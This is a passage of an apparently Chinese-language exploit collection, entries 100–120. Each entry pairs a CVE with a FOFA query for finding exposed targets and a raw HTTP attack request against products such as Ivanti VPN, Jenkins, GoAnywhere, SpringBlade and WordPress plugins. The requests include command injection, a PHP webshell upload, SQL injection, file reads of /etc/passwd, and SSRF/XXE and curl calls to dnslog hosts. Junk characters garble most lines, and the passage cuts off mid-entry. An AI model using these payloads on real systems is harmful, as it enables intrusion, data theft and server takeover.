CVE-2024-0305* K- ?3 w; J) p8 E
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
" X3 Q8 n# W( \" P9 C3 ^3 s! B( G! ]POST /classes/common/busiFacade.php HTTP/1.1" \4 l) [5 u5 |$ R; h+ Y( u$ k
Host: 192.168.40.130:8080
~; i* Z) M; d- @( O% a2 i6 }" fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 J( n+ |! a v! r) s: k# l
Connection: close
% v; J1 W/ v4 w5 t- XContent-Length: 154- E/ A1 I9 f) W: N1 g
Accept: */*
7 p3 U) p$ K! N% U% ^Accept-Encoding: gzip, deflate8 w5 K$ O" z2 i! J! b/ u9 i# Y9 v
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: L$ K* X& u2 F% A
Content-Type: application/x-www-form-urlencoded; charset=UTF-8" S3 X. X/ r# ?- m0 j+ E4 M
X-Requested-With: XMLHttpRequest1 |2 q' A2 |3 ~% I1 P
) K6 k' A) C8 h. `6 \8 x%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D
A8 b& N$ E; F( \3 w0 Y1 _
2 G5 j" x" Z" q: L, f* i" Z* J, w8 J: P1 e, ]5 U5 m+ G: z
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
4 J) E# Z7 G- U* _CVE-2024-0352$ Y4 S' u3 w/ r% _5 Z( p- w
FOFA:icon_hash="874152924"# K& F% E' Z3 `9 I: D; C' @
POST /api/file/formimage HTTP/1.1$ y1 I1 t4 ^3 J8 N1 @5 X ?
Host: 192.168.40.130
& \$ ~: M+ i5 r: _3 T/ A; AUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
7 k3 G& G1 J3 EConnection: close
/ y1 l6 i* X: x5 r1 GContent-Length: 201! D$ m0 ~- m2 W0 S# r" ~
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
6 V2 o" \" f1 r) _Accept-Encoding: gzip4 h) e: I4 o$ I6 X( Q5 o5 Z8 V: w
# [, |4 l; A$ f% V3 p
------WebKitFormBoundarygcflwtei
* u4 `$ d/ P- T* K% E. E0 ^Content-Disposition: form-data; name="file";filename="IE4MGP.php"
4 K4 G' t7 ?: Q4 `9 vContent-Type: application/x-php [ X6 j" A3 S/ F% ?5 o- ?3 b. y
8 K: ]2 _2 O6 t2ayyhRXiAsKXL8olvF5s4qqyI2O
: ]; {2 u- Q2 \6 s0 t9 l# K: k------WebKitFormBoundarygcflwtei--
7 d3 _) N( G2 C% k, a4 A; i- A7 ?
1 H$ m/ R' K) W3 ]. _6 Y101. ivanti policy secure-22.6命令注入
+ E0 h6 V- ]6 W9 `CVE-2024-21887* W( j( F8 l! F3 b3 l
FOFA:body="welcome.cgi?p=logo"7 b6 O' B3 U' z9 T
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
/ u7 U! G. T) s0 |/ F' {, ~Host: x.x.x.xx.x.x.x* J2 e' }$ c* n! D1 N* D' s$ S
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36! l' u# D" l& F1 t1 F
Connection: close+ p& i# T8 I" N4 K, a
Accept-Encoding: gzip! a& h3 g: `0 M; H- c4 X
! Z N$ |/ d% {7 q d) z! z7 ~6 h. n
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
0 J% {8 |& ~$ bCVE-2024-218937 z, b( H+ E7 o, S
FOFA:body="welcome.cgi?p=logo"# p2 N u- X; Q: x0 R6 K* n
POST /dana-ws/saml20.ws HTTP/1.1
! i! ]" h9 R5 n& C8 zHost: x.x.x.x) K0 ~4 Q3 W0 ]* j) A5 w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" Q+ i7 o( }) O2 f8 @# O
Connection: close6 N3 t5 f" G+ N. m0 h# u, W i1 R
Content-Length: 7926 O6 q( o' M" K& z' c' M
Accept-Encoding: gzip
- p: j, N) t$ u5 o- k, M7 H
. W8 J' _% e1 a# D<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>0 ^4 V$ I3 C4 F' b3 W
9 w. F. y7 Q6 D5 Y4 a
103. Ivanti Pulse Connect Secure VPN XXE
1 g7 B3 ?9 | S) Q, _CVE-2024-22024
! g* S3 K/ `! M% hFOFA:body="welcome.cgi?p=logo"' S. P2 v {) d
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
' H: }( r% k+ m8 g& XHost: 192.168.40.130:111& j9 G/ ~; h+ E' [2 N
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36( v; d( u4 h J5 Q
Connection: close2 @9 i, i% _0 c# h
Content-Length: 204
; x* J) s9 Y& YContent-Type: application/x-www-form-urlencoded
% l8 C; }4 C9 h+ R% n- H' nAccept-Encoding: gzip* P4 M4 \* _8 R3 E
( [( q3 [5 W4 E7 V
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==( \& Z, x$ s. J8 ~
: _1 G, g1 G9 }& Y2 U5 X( Y6 d, t
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
0 p% ^$ i7 b: M7 P0 Z<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>! Z+ r9 |, J9 a/ _9 p" ], z' `
" e$ r" e/ i! {: g% R$ S0 b$ e9 F* ^, X$ q
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
0 ^) G1 p3 a$ \2 X" y ^# JCVE-2024-0569% Z/ o6 f& M' Y9 c. [/ \ s8 O4 _
FOFA:title="TOTOLINK"
E1 D" E7 I) F5 d- K" l" Z9 E' ~POST /cgi-bin/cstecgi.cgi HTTP/1.1
% l R: a" s1 JHost:192.168.0.1: L: t, ?1 W7 T# Z* H! U+ A; s
Content-Length:413 ]" D F g& P7 W8 U( Z8 p
Accept:application/json,text/javascript,*/*;q=0.01
' V; D2 x2 Z3 B& p, [; s8 b3 D5 QX-Requested-with: XMLHttpRequest' D( O/ K$ ~5 Z. e
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36: q: B' I3 O: q5 H5 |4 l
Content-Type: application/x-www-form-urlencoded:charset=UTF-81 s& Y0 a- j4 `( O; P, p
Origin: http://192.168.0.1
8 B% a* S% F4 UReferer: http://192.168.0.1/advance/index.html?time=1671152380564
7 s" C" T6 N" z' r1 t' mAccept-Encoding:gzip,deflate
7 L. W( M( |$ Z4 ]7 DAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7# B Y- t0 _; M0 D4 P) ?8 `
Connection:close
g" ]# B9 z. ^3 {2 Y
0 l/ a9 n, v+ }{
, W. s+ C+ _ o; O! v3 L+ {"topicurl":"getSysStatusCfg",
; Z* l* C4 r# J% j$ R' M" e! x7 y7 R"token":""3 d" B/ |. H* b/ r5 H
}
0 J) c3 j5 `( o m6 m2 [ k4 K: m
/ J0 S0 R" h; I2 [105. SpringBlade v3.2.0 export-user SQL 注入
- i& G f( O; I. j9 h4 KFOFA:body="https://bladex.vip"- a& G7 D- s3 G+ j# L+ A$ ]5 B
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=13 V9 I/ Q2 u* G
2 \+ q3 Q' U9 c- O7 C+ i
106. SpringBlade dict-biz/list SQL 注入+ M) N6 B$ u1 n3 z: u7 |5 E
FOFA:body="Saber 将不能正常工作"- F9 E! ]. \* h4 o
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
8 F0 z" K* L$ C. [7 E: ~ pHost: your-ip8 j- l- x4 {! ^. N* O
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) G/ @; G' ~" s+ OBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A8 L+ z8 x0 u( G
Accept-Encoding: gzip, deflate' h' o! I( _& d9 C4 L
Accept-Language: zh-CN,zh;q=0.9' t/ ]. d8 s, W, p; \, j
Connection: close/ {' i+ [* R& L7 }
$ e+ u8 Q; l; s: ?0 Q: `
7 J- k1 c* l% X. ]1 d6 l! L107. SpringBlade tenant/list SQL 注入. G) ^! G0 H3 n1 Q* p# F0 v8 }
FOFA:body="https://bladex.vip"
6 H3 e0 \ S) J8 IGET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
8 H7 Q* X' `: W" }Host: your-ip0 T/ k: H* \) l5 U7 m
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36! E* m, k2 H! P. h+ S3 K5 b
Blade-Auth:替换为自己的
( R" ~( q9 u2 x! I! O+ e" tConnection: close
) T) {: F, F0 d1 `
5 k- O/ H2 }3 T C: y- l. y3 k" z( Q+ D: X$ J- `
108. D-Tale 3.9.0 SSRF8 `6 R6 c: M0 g5 U4 G/ `1 b$ q# {1 A
CVE-2024-21642; ?+ {9 p/ X% Q Q. `# u' G X
FOFA:"dtale/static/images/favicon.png"
+ M' e) Q5 w$ I: RGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1( a5 }) B1 W" T9 f; \3 u
Host: your-ip$ v9 f4 ^9 v, a
Accept: application/json, text/plain, */*
0 @: J" h4 l: NUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 j* R8 [0 k+ `1 P8 S. `+ zAccept-Encoding: gzip, deflate6 a9 ~/ m# T8 D! C# q3 k4 k
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
# [% J' H- H4 i- l# G+ t. aConnection: close
$ R3 s8 i H. R% s
+ q3 L/ a) }" G4 D
$ G4 ?5 T: E( U- _7 d a5 c109. Jenkins CLI 任意文件读取9 L* Y) k: M4 @# q
CVE-2024-23897
0 h. x$ C6 L x4 }* GFOFA:header="X-Jenkins"
5 \! J4 g5 C: U/ a: P% r& sPOST /cli?remoting=false HTTP/1.1
z" c: t" V0 rHost:2 _9 G0 P* { z9 l* Q/ N9 `
Content-type: application/octet-stream$ v! L% |4 m3 _; r; _9 U# C8 t
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
1 {7 \0 b7 Y5 @- @1 F1 v7 {Side: upload
' c! g6 M3 ?) d( RConnection: keep-alive
9 i# b2 O8 f2 s. r n7 {$ N3 n" BContent-Length: 1633 m" ~2 Z }1 g& L, Q( @
$ v- I8 f' P' Q7 t/ Zb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
* I- ?6 w# x# E" H! {( k U
# ^: q" |# ^* M, k$ |
5 ?* K3 g( j L9 L$ A7 ~8 \POST /cli?remoting=false HTTP/1.1
' N0 `5 U6 k% K4 ]; ~Host:
) X0 A( |# y7 c9 C/ t) y, e4 WSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e920 [% ~. C7 U D1 j5 b
download
( t3 N/ G. p# U* Z* v8 uContent-Type: application/x-www-form-urlencoded
. g5 I$ |7 b: K9 BContent-Length: 0
- w2 V2 p6 P8 q) h! y7 g% Q9 F
6 R: i$ A2 C) C+ _3 V
% e$ r& ^+ ~* d9 q: `* i0 _( OERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin+ H! y( w0 @9 V
java -jar jenkins-cli.jar help
! q* y4 y' C' R; t% Q' Z[COMMAND]* D4 R- A& k6 j" [5 ]4 L
Lists all the available commands or a detailed description of single command.. m: f( q) g' o" D
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
, a, X& v( U6 R k, N8 ~+ s. V" t* _7 ]- [0 ^8 _0 W/ i
- B, S8 O+ g% `: C110. Goanywhere MFT 未授权创建管理员4 `/ T a# x, c9 T
CVE-2024-0204
# |9 ?$ }, o6 ]FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
/ S+ F( M7 M! `* vGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
q* j8 }) C. J$ }+ v1 h) `Host: 192.168.40.130:8000* ^* W! r- V n* A. q' b9 B9 p8 [
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
5 v0 f: S. S- M: hConnection: close. L: z$ I# _. ~! [! F. `1 m% u8 A
Accept: */*; z, a+ R, B9 u, i
Accept-Language: en( {3 M/ c0 w1 P6 N7 \& n
Accept-Encoding: gzip
7 x- E, \( T+ e! ]$ K# t9 S6 l' \' [% H* \8 w$ [- Z, t. d
& e1 p! I/ g0 X: }$ ]
111. WordPress Plugin HTML5 Video Player SQL注入
, y3 q1 J$ g! b9 mCVE-2024-1061
5 u) p& A0 Q% B+ q) A4 uFOFA:"wordpress" && body="html5-video-player"3 f! U& N. Z. g6 U% j
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
5 V' E4 i6 l" BHost: 192.168.40.130:1122 Q% y0 a$ ^. C- ^) x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36( c( l# Q: {0 ?% d
Connection: close
& ^ W2 ^# X) }% V5 W wAccept: */*
0 e+ a4 L. c8 j3 c# ]Accept-Language: en
1 o0 t: p) P( o( ]0 FAccept-Encoding: gzip
9 R, e+ l$ d9 g! f
`' H, \3 f, X$ a& p5 ^; [
* B' C$ Z0 Z: c112. WordPress Plugin NotificationX SQL 注入
6 q. n ^! b5 Q! R8 \0 M9 sCVE-2024-1698& c4 a- B# g( u( `8 q
FOFA:body="/wp-content/plugins/notificationx"% c- `( T9 F$ ]9 @! k, H/ s& l
POST /wp-json/notificationx/v1/analytics HTTP/1.1
% X* C4 t8 C) G* e+ OHost: {{Hostname}}
& G4 h) L% U5 [- |/ {6 ?, A U, uContent-Type: application/json2 I. ] j1 q" q% j% U3 k. ` Z5 S
, A$ R% J9 \, ]3 I{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}# v2 h3 O# T5 z# U( x4 D& _
1 V0 r5 r8 |, A, {
0 j2 u k' x& P5 n5 F' U6 |1 B0 X
113. WordPress Automatic 插件任意文件下载和SSRF( P& O# [) [2 n% u3 `9 I! m6 U
CVE-2024-27954
9 c" _# s1 _2 OFOFA:"/wp-content/plugins/wp-automatic"
4 Z. _+ u5 t" I; PGET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
* r" L/ Z* b9 S1 B* u7 ?Host: x.x.x.x; R/ G \ r2 |
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
0 H: f6 }$ C, sConnection: close
7 _ b: ]+ n8 y) j; iAccept: */*
9 u6 g0 D: P8 u; h# N9 e& AAccept-Language: en
% k7 S8 V% I! F+ q+ k% @Accept-Encoding: gzip
; W: O7 @" d$ f) A6 @
) w8 C ?% P, D5 \5 `7 ~, I
# v, E! r4 [$ g) H3 m H0 L114. WordPress MasterStudy LMS插件 SQL注入% E# Q. u6 q) }+ k) {; G) g! R
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
9 G3 v" I. M- O- a# ]: g/ e/ S8 bGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1) g: K6 Q* ` i1 @. m
Host: your-ip
. k! U' G2 \. m, c/ b$ z7 f5 r* U, aUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.361 x5 J* \0 U- g9 O8 G+ X- I
Accept-Charset: utf-8' Q% d% x" t9 t, e
Accept-Encoding: gzip, deflate* k4 ?, V; R8 o; J
Connection: close4 Y6 s6 _5 c/ Y; c* ?0 A
- [- w% i$ p' t0 Q7 s( [
$ x) ?- u% G0 K: e; Y4 f% T- M115. WordPress Bricks Builder <= 1.9.6 RCE
3 Y: ?' P( {$ @ T8 g2 QCVE-2024-256000 N6 F& z& ^) j. |% o3 W
FOFA: body="/wp-content/themes/bricks/"1 Q& |( n% P0 a- n
第一步,获取网站的nonce值5 e! j: ] t2 C# {; U2 w
GET / HTTP/1.1+ V- E" P! `* ?: e% {
Host: x.x.x.x# S4 y \ X" N: V+ j: V9 U0 b) ?) Z- K
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 H0 w6 ]/ a: c- l/ _' U( q
Connection: close
3 z: U. @) T6 ]+ @% AAccept-Encoding: gzip
1 Q* p* s' z( P6 o$ p! N. J. B4 b+ m" E4 l0 i: X
0 ]" a" L: h: X4 {* q, o6 ^第二步替换nonce值,执行命令
$ L8 N& {% X# @POST /wp-json/bricks/v1/render_element HTTP/1.1
5 k# n4 ?# @4 O) m! p1 b. oHost: x.x.x.x# O3 ]( y; x, I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
A) k" t/ \6 H1 P4 }) _Connection: close
4 o. T3 R ~* ~: xContent-Length: 356/ ^, r% C# U+ L, i
Content-Type: application/json0 u2 G! i2 {9 Y/ x0 c' z6 ?
Accept-Encoding: gzip
: Q( ~3 a k$ j
+ x. C/ i; `/ Q* O5 S- ?1 |{
" ]* P. @3 X$ B4 U0 R+ e"postId": "1",
1 ^) A1 }4 p" I "nonce": "第一步获得的值",
2 [8 o# O( l) q1 U3 w4 `: V "element": {
i5 j `' x7 u# b+ f7 K "name": "container",/ H" K/ u! {# X/ p3 f
"settings": {
- M7 B4 T7 z5 ?0 Q% H; p( K6 J4 p "hasLoop": "true",0 I* ]$ t& m8 n
"query": {4 b% Z8 {) f% B, V
"useQueryEditor": true,- {3 K& d# L3 x& U$ f
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",% Y8 E; {0 x2 I' W
"objectType": "post"4 K7 a% ~# W* B% j4 k& v8 t, ~ l
}3 x) a. U) u4 [
}4 \' } M4 ?" F5 d; P+ I+ i; u
}
) _: e( N( E( b- L9 F}
( j; N# K7 x( C7 A' d5 o
# j6 M6 g/ D# q6 [! U9 N4 q
$ m% |$ t0 d0 W116. wordpress js-support-ticket文件上传. u* |- K0 M: a' {8 d7 v* Q: F
FOFA:body="wp-content/plugins/js-support-ticket"
: U! T# H: l) r. mPOST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1 R p4 q1 }4 A$ U E
Host:
7 k$ t: @- e% m/ YContent-Type: multipart/form-data; boundary=--------767099171# w `5 c3 E& k5 t7 B
User-Agent: Mozilla/5.0. m: x/ W! C+ b# i2 q
' y& `, _9 ?/ {' j3 J1 r----------767099171* {2 s$ B1 l- f
Content-Disposition: form-data; name="action". V" t+ n0 ~$ \4 ^& z" ^5 [
configuration_saveconfiguration
( L8 q: F2 Z7 {----------767099171
' ]7 y% U& p0 a0 c9 a. {Content-Disposition: form-data; name="form_request"
- }$ R i3 u# U6 ] `8 Qjssupportticket/ r& p# K- j2 y5 ?' p2 }7 r
----------767099171
1 _4 X2 W0 h2 i6 I! VContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
O+ \) o h: e6 QContent-Type: image/png
" }5 t# e( ]9 U; m----------767099171--
" `0 G, N( D! c+ a8 [. b7 O1 e
& }! ?# {/ z5 v- }$ f/ |; g; j; V( v- z/ Z$ U! d
117. WordPress LayerSlider插件SQL注入
# t" U( K7 A; \& U; y, rversion:7.9.11 – 7.10.0
/ f2 z* B$ M, a6 aFOFA:body="/wp-content/plugins/LayerSlider/"1 }4 i6 t- e* n( x# l! z7 a6 {& L
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1/ @5 g, _/ {: I5 b8 r+ S% x# m I
Host: your-ip" \: f6 v( j' o% {" _2 N
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
4 I% d/ e. S. p9 X& H9 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
# s' a4 l& M3 H8 {Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
! I# n3 `( |& ]% U: T/ sAccept-Encoding: gzip, deflate, br
5 w i1 U: O$ `7 O4 g4 yConnection: close2 x/ z8 J9 v6 ?# V9 }' j
Upgrade-Insecure-Requests: 1/ ]6 y1 ?3 y" _ u6 O
, V# d# u2 m8 |3 L1 L$ L" g/ @: u& Z; [& B- w8 H
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
; i! b% G; |+ w6 fCVE-2024-0939) K8 b' q! h H: a1 l$ @2 p, ]. J
FOFA:title="Smart管理平台"
& `( C5 L; d3 ~+ s, p) ]POST /Tool/uploadfile.php? HTTP/1.12 c& |! J2 Z7 n
Host: 192.168.40.130:8443
& R8 p# T# w& N. vCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
m7 r0 V( l7 H4 D" y3 l" D c) DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
* V1 q) _. c6 _ Z3 JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( [, F+ v, Q7 Y/ r% n( T8 B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2/ H, V' s$ q/ p+ U9 I7 {( ]1 v
Accept-Encoding: gzip, deflate' u- }) C: S$ k" Z, q. X
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
. x3 u* ^% d6 o' ]' U8 ?$ OContent-Length: 405
! ~9 c! O$ k1 X$ ]! Y3 S, T5 v' UOrigin: https://192.168.40.130:8443
5 Q) r% H* R$ p3 F9 p' J; M5 hReferer: https://192.168.40.130:8443/Tool/uploadfile.php
+ w( r/ R; J3 N; }7 n" \+ VUpgrade-Insecure-Requests: 1) ]" j% H5 E3 Z% g4 o8 g* a; f2 F
Sec-Fetch-Dest: document
- ^* i B" F: o' `$ ]Sec-Fetch-Mode: navigate1 V Q- q1 q7 p6 k
Sec-Fetch-Site: same-origin0 s% ~; e7 z. Z) S. n
Sec-Fetch-User: ?1& B; I0 U4 B* Q8 L# Z
Te: trailers
! x1 M/ { }2 ^# d hConnection: close
+ i& W; B3 ^# ^( ]( ^' C6 L. h
3 ]2 o. J1 R0 Z3 _0 c; {! ^: U: F; V-----------------------------13979701222747646634037182887% }: E9 n# M0 I$ N; i# W1 X3 ] l
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
$ |( M. Q' R9 |, m t/ a$ _( ^Content-Type: application/octet-stream
; S! W$ l8 }; ^) G6 r4 t- G+ G: E9 w
<?php, i/ p1 z8 @5 U$ q' E$ Q- N9 B8 u
system($_POST["passwd"]);2 s6 B! l: R7 U8 _, m
?>( a" K) ^' [: n7 b# ]
-----------------------------13979701222747646634037182887( t2 r6 C4 c: Q- V6 e
Content-Disposition: form-data; name="txt_path"; [! {6 H& d, P3 T8 C7 Y
% V) z% I+ I8 H5 p/home/src.php+ P' m. x/ ]$ J& H+ ^/ q
-----------------------------13979701222747646634037182887--" m$ d* O7 d2 M& {& K/ b, x2 ^
$ w7 `4 `- ^3 t
: I) e+ {, p/ H
访问/home/src.php+ S7 |: N3 F1 e: C9 f$ D% U
2 ^3 ~' V" x' G0 R/ o
119. 北京百绰智能S20后台sysmanageajax.php sql注入$ f. L- E3 ^( L" A. \ D/ b3 [
CVE-2024-12542 j; O" K) a' ?7 ]3 Q; ^) h
FOFA:title="Smart管理平台"# h0 Q5 z7 j( f3 K- E
先登录进入系统,默认账号密码为admin/admin
5 X6 y# G7 l4 ]* tPOST /sysmanage/sysmanageajax.php HTTP/1.110 L9 U5 h+ K# L0 A# |8 s3 y% M& G! a
Host: x.x.x.x
3 T/ X$ v8 L9 I$ e) wCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
$ q/ s) ^) {. s& a- _: _/ yUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.05 v, y2 O: A/ h8 P% { ?( |
Accept: */*
8 x0 E' z6 @" Z. j+ K. j$ FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 Y2 z9 E; r/ U/ j1 l& w
Accept-Encoding: gzip, deflate( o* Y* b( r6 J8 x- x) C
Content-Type: application/x-www-form-urlencoded;
6 b% ?. _, e+ L! s9 YContent-Length: 109
& z6 R; f. ]: \6 P% b. `Origin: https://58.18.133.60:8443: l' _- S7 `+ J$ q
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
5 `" O1 ~2 _9 Q. {. \+ MSec-Fetch-Dest: empty' K3 ^! Z. D5 d6 S. a* E
Sec-Fetch-Mode: cors
6 W. p: T1 M% d1 LSec-Fetch-Site: same-origin% G) X* q, U6 h% {9 H, e
X-Forwarded-For: 1.1.1.1
4 R5 r/ X; p7 P; c( {/ k4 BX-Originating-Ip: 1.1.1.1
" w$ B' _8 q( d0 J7 MX-Remote-Ip: 1.1.1.1! Y5 b/ R4 o$ G& u( L
X-Remote-Addr: 1.1.1.1
8 y3 e0 ~' r% ETe: trailers0 e. G" M7 ?5 [" p3 Z9 S5 r1 a: q( t% k
Connection: close2 R0 {/ Y. u v# m: X
! E$ N5 z6 ?' G! ]9 x
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456
- E% d5 @' J# g2 W9 \# z/ f
( f* ^. G4 p A' g$ i% D
1 h& J3 T; C0 [. t120. 北京百绰智能S40管理平台导入web.php任意文件上传
6 P' _6 e) {# |0 @6 ]& N3 |CVE-2024-12532 g4 g2 u% k& w$ e! d K
FOFA:title="Smart管理平台"8 r/ M: [* C# h' B9 W
POST /useratte/web.php? HTTP/1.1
- @% J6 V( g% s: [5 U) n3 uHost: ip:port8 e& ^7 l! N( v1 K
